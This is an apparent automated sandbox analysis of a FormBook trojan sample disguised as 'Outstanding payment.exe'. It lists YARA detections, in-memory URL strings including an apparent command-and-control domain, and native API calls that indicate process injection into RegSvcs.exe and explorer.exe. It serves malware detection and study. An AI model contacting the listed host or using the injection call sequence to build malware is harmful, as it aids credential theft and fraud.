Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.otelhafnia.info/a03d/www.kkkk.shop
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.otelhafnia.infoReferer:
Source: explorer.exe, 0000000A.00000002.4541154394.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2116427332.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 0000000A.00000002.4531583255.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2095932568.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000A.00000002.4534821677.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2105292943.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000A.00000000.2095932568.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4531583255.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000000.2092490367.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4527780595.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3096430649.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 0000000A.00000000.2105292943.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097842641.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4538468202.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3096220072.0000000009B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000A.00000000.2105292943.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4538536779.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3096220072.0000000009D42000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000000A.00000000.2116427332.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4541154394.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 0000000A.00000002.4534821677.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2105292943.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 0000000A.00000002.4534821677.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2105292943.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Outstanding payment.exe.4234148.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Outstanding payment.exe.4234148.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Outstanding payment.exe.4234148.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Outstanding payment.exe.4234148.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.4544744783.00000000118C5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Outstanding payment.exe PID: 6252, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: iBSWjb.exe PID: 6648, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 6564, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msiexec.exe PID: 3876, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 4676, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Outstanding payment.exe

Source: C:\Windows\explorer.exe	Code function: 10_2_118AEE12 NtProtectVirtualMemory,	10_2_118AEE12
Source: C:\Windows\explorer.exe	Code function: 10_2_118AD232 NtCreateFile,	10_2_118AD232
Source: C:\Windows\explorer.exe	Code function: 10_2_118AEE0A NtProtectVirtualMemory,	10_2_118AEE0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041A320 NtCreateFile,	15_2_0041A320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041A3D0 NtReadFile,	15_2_0041A3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041A450 NtClose,	15_2_0041A450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041A500 NtAllocateVirtualMemory,	15_2_0041A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041A31B NtCreateFile,	15_2_0041A31B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041A44B NtClose,	15_2_0041A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041A4FF NtAllocateVirtualMemory,	15_2_0041A4FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642B60 NtClose,LdrInitializeThunk,	15_2_01642B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_01642BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642AD0 NtReadFile,LdrInitializeThunk,	15_2_01642AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642D30 NtUnmapViewOfSection,LdrInitializeThunk,	15_2_01642D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642D10 NtMapViewOfSection,LdrInitializeThunk,	15_2_01642D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642DF0 NtQuerySystemInformation,LdrInitializeThunk,	15_2_01642DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642DD0 NtDelayExecution,LdrInitializeThunk,	15_2_01642DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642C70 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_01642C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642CA0 NtQueryInformationToken,LdrInitializeThunk,	15_2_01642CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642F30 NtCreateSection,LdrInitializeThunk,	15_2_01642F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642FE0 NtCreateFile,LdrInitializeThunk,	15_2_01642FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642FB0 NtResumeThread,LdrInitializeThunk,	15_2_01642FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642F90 NtProtectVirtualMemory,LdrInitializeThunk,	15_2_01642F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	15_2_01642EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642E80 NtReadVirtualMemory,LdrInitializeThunk,	15_2_01642E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01644340 NtSetContextThread,	15_2_01644340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01644650 NtSuspendThread,	15_2_01644650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642BE0 NtQueryValueKey,	15_2_01642BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642BA0 NtEnumerateValueKey,	15_2_01642BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642B80 NtQueryInformationFile,	15_2_01642B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642AF0 NtWriteFile,	15_2_01642AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642AB0 NtWaitForSingleObject,	15_2_01642AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642D00 NtSetInformationFile,	15_2_01642D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642DB0 NtEnumerateKey,	15_2_01642DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642C60 NtCreateKey,	15_2_01642C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642C00 NtQueryInformationProcess,	15_2_01642C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642CF0 NtOpenProcess,	15_2_01642CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642CC0 NtQueryVirtualMemory,	15_2_01642CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642F60 NtCreateProcessEx,	15_2_01642F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642FA0 NtQuerySection,	15_2_01642FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642E30 NtWriteVirtualMemory,	15_2_01642E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01642EE0 NtQueueApcThread,	15_2_01642EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01643010 NtOpenDirectoryObject,	15_2_01643010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01643090 NtSetValueKey,	15_2_01643090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016435C0 NtCreateMutant,	15_2_016435C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016439B0 NtGetContextThread,	15_2_016439B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01643D70 NtOpenThread,	15_2_01643D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01643D10 NtOpenProcessToken,	15_2_01643D10

Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_010925C1	0_2_010925C1
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_010991C4	0_2_010991C4
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_010913C8	0_2_010913C8
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_01093470	0_2_01093470
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_01091C08	0_2_01091C08
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_010920D2	0_2_010920D2
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0109C39B	0_2_0109C39B
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_010943B0	0_2_010943B0
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_010943C0	0_2_010943C0
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0109C400	0_2_0109C400
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_01090870	0_2_01090870
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_01094F08	0_2_01094F08
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0109CE8F	0_2_0109CE8F
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0109CED3	0_2_0109CED3
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_01094EF9	0_2_01094EF9
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0109134B	0_2_0109134B
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_01095210	0_2_01095210
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0109345C	0_2_0109345C
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_010957A2	0_2_010957A2
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_010957B0	0_2_010957B0
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_01095600	0_2_01095600
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_01095610	0_2_01095610
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_010959CA	0_2_010959CA
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_010959D8	0_2_010959D8
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_09BD02A0	0_2_09BD02A0
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_09BD0291	0_2_09BD0291
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_09BD84E8	0_2_09BD84E8
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_09BD0C50	0_2_09BD0C50
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_09BD77E0	0_2_09BD77E0
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F0B70	0_2_0B2F0B70
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F5A80	0_2_0B2F5A80
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F7998	0_2_0B2F7998
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F6020	0_2_0B2F6020
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F0040	0_2_0B2F0040
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F2098	0_2_0B2F2098
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F70E8	0_2_0B2F70E8
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F5640	0_2_0B2F5640
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F16E0	0_2_0B2F16E0
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F1B28	0_2_0B2F1B28
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F1B19	0_2_0B2F1B19
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F5A71	0_2_0B2F5A71
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F0AD0	0_2_0B2F0AD0
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F6928	0_2_0B2F6928
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F4920	0_2_0B2F4920
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F6918	0_2_0B2F6918
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F4910	0_2_0B2F4910
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F19B1	0_2_0B2F19B1
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F7988	0_2_0B2F7988
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F7F78	0_2_0B2F7F78
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F4FA0	0_2_0B2F4FA0
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F4FB0	0_2_0B2F4FB0
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F7F88	0_2_0B2F7F88
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F3D61	0_2_0B2F3D61
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F3D70	0_2_0B2F3D70
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F5CB9	0_2_0B2F5CB9
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F5CC8	0_2_0B2F5CC8
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F51C0	0_2_0B2F51C0
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F51D0	0_2_0B2F51D0
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F001F	0_2_0B2F001F
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F6010	0_2_0B2F6010
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F2089	0_2_0B2F2089
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F70D8	0_2_0B2F70D8
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F5631	0_2_0B2F5631
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2FB6F8	0_2_0B2FB6F8
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2FF6F0	0_2_0B2FF6F0
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F16D1	0_2_0B2F16D1
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F3589	0_2_0B2F3589
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F55F0	0_2_0B2F55F0
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F5438	0_2_0B2F5438
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F6468	0_2_0B2F6468
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F5448	0_2_0B2F5448
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F6459	0_2_0B2F6459
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D0100	9_2_015D0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01626000	9_2_01626000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EE3F0	9_2_015EE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016602C0	9_2_016602C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0535	9_2_015E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016365D0	9_2_016365D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016365B2	9_2_016365B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0770	9_2_015E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01604750	9_2_01604750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FC6E0	9_2_015FC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F6962	9_2_015F6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EA840	9_2_015EA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E8F0	9_2_0160E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D28F0	9_2_015D28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C68F1	9_2_015C68F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01618890	9_2_01618890
